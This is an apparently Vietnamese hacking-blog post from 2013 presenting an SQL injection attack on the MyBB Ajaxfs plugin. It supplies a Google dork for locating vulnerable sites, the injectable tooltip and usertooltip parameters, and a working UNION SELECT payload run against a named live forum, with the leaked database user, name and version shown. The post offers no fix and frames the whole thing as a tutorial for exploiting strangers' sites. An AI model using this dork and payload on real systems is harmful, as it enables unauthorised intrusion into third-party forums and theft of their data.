Mybb Ajaxfs Plugin Sql Injection vulnerability
Tuesday, December 24, 2013
Tóm tắt là ai sài cái Mybb Ajaxfs Plugin thì bị dính lỗi SQLi và bị khai thác chiếm quyền như bao mã nguồn khác. Và thông tin chi tiết ở phía trên đã nói rõ hết lỗi ở chỗ nào và cách khai thác ở đâu luôn chỉ cần các bạn biết viết vài câu query của Mysql, Mssql hay oracle là đều có thể sài được lỗi SQLi này. Trong trường hợp lỗi này thì đó là MySQL.
Cách tìm kiếm site bị lỗi: ta vào google.com.vn và tìm với từ khóa 
DorK: inurl:ajaxfs.php?tooltip=
Ra một rừng các site bị dính lỗi này đa phàn toàn tiếng ả rập xê ụt nhìn giống giun với dế không hiểu gì hết nhưng vẫn áp dụng chơi được bằng tiếng Anh )
Ra được site nào thì vào 1 trong 2 link sau để khai thác lỗi của nó:
http://site.com/mybb/ajaxfs.php?tooltip=[sql]
http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
Show 1 câu query cơ bản nhất với Demo sống luôn:
http://forum.4lbazdidsaz.com/ajaxfs.php?tooltip=-1' union select 1,2,3,4,5,6,7,concat(user(),0x3a,database(),0x3a,version()),9,10,11,12,13,14,15,16,17,18,19-- -
và đây là cái cần thấy:
admin4l_forum@localhost:admin4l_forum:5.1.65
CCb - xong cái tut . Còn cách Fix sẽ update link bên box security sau khi có bài
Megaxem Cinema - Xem thả ga
![Adf.ly Killer Code [Tutorial]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq5aQcqLaWdmdG7Wwx7ZDxU7d5GdSoabWZf_X3MFgSuJjk1pKnQGwfnaRy7nF8sOiVMiBja-G7DlqoYyskZpCec1pBbqeQMvyW7bV6UV8Zo5slf8oLTuhJBecfTE_tibx1upsSL8t3Jr4/s72-c/tut1.png)
All comments [ 0 ]
Your comments